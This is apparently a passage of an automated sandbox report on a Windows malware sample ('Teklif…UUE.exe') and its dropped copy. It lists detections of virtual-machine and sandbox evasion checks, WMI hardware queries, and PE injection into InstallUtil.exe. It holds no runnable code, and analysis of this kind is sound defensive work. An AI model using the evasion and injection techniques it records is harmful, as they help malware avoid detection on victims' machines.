                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: Teklif-6205018797-6100052155-UUE.exe PID: 3060, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ptqlzgvzpfa.exe PID: 1120, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ptqlzgvzpfa.exe PID: 2928, type: MEMORYSTR
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206832205.0000000002538000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000004.00000002.2446673623.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000005.00000002.2532866894.0000000002918000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeMemory allocated: 750000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeMemory allocated: 24F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeMemory allocated: B10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 23E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 25F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 45F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory allocated: 1300000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory allocated: 2F00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory allocated: 4F00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory allocated: D20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory allocated: 28D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory allocated: E80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: F60000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2D90000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1290000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: F60000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2BD0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2B20000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: InstallUtil.exe, 00000008.00000002.3330341537.0000000005F70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllturev
                      Source: Ptqlzgvzpfa.exe, 00000005.00000002.2529385322.0000000000B57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
                      Source: Ptqlzgvzpfa.exe, 00000005.00000002.2532866894.0000000002918000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                      Source: InstallUtil.exe, 00000002.00000002.2456804856.0000000004F22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
                      Source: Ptqlzgvzpfa.exe, 00000005.00000002.2532866894.0000000002918000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206321146.0000000000822000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
                      Source: Ptqlzgvzpfa.exe, 00000004.00000002.2443133058.0000000001043000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2547975039.0000000005F20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 360000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 360000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 360000Jump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 362000Jump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 39C000Jump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 39E000Jump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 5C0008Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: AE6008Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: B7D008Jump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeQueries volume information: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
